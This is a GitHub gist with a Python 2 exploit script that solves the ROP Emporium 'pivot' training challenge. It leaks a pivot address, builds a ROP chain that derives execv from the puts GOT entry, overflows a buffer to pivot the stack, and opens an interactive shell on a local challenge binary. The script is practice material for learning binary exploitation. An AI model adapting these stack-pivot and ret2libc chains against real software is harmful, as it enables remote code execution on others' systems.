Last active
September 2, 2017 09:45
-
-
Save segura2010/f68f2780e4ce078208714c60377efce2 to your computer and use it in GitHub Desktop.
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html) | |
It pops a remote shell. | |
Run the binary with: nc -lvc ./pivot -p 4444 | |
Then, run this exploit :) | |
''' | |
import socket | |
from struct import pack | |
import telnetlib | |
def p64(x): | |
return pack('<q', x) | |
s = socket.socket( | |
socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(("127.0.0.1", 4444)) | |
data = s.recv(1000) | |
# print data | |
print "[+] Connected!" | |
while str.find(data, "to pivot: ") == -1: | |
data += s.recv(1000) | |
# print data | |
pivot = str.find(data, "to pivot: ") | |
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14] | |
print "[+] Got Pivot: ", pivot | |
pivot = int(pivot, 16) | |
command = '/bin/sh\x00' | |
rop = command | |
rop += 'C'*8*3 # r13, r14, r15 | |
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got | |
rop += p64(0x602020) # puts@got | |
rop += p64(0x400900) # pop rbp; ret; | |
rop += p64(0x5D1D0) # execv-puts offset | |
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address) | |
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory | |
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL) | |
rop += p64(pivot) # rdi | |
rop += p64(0x400b71) # pop rsi; pop r15; ret; | |
rop += p64(0x0) # rsi | |
rop += p64(0x0) # r15 | |
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX) | |
rop += '\n' | |
s.send(rop) | |
data += s.recv(1000) | |
print "[+] Pivot ROP sent.." | |
rop = 'A'*40 | |
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot) | |
rop += p64(pivot+len(command)) | |
rop += 'B'*8 | |
rop += '\n' | |
print "[+] Overflow ROP sent.." | |
s.send(rop) | |
data += s.recv(1000) | |
print "[+] Shell popped!" | |
t = telnetlib.Telnet() | |
t.sock = s | |
t.interact() | |
#s.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment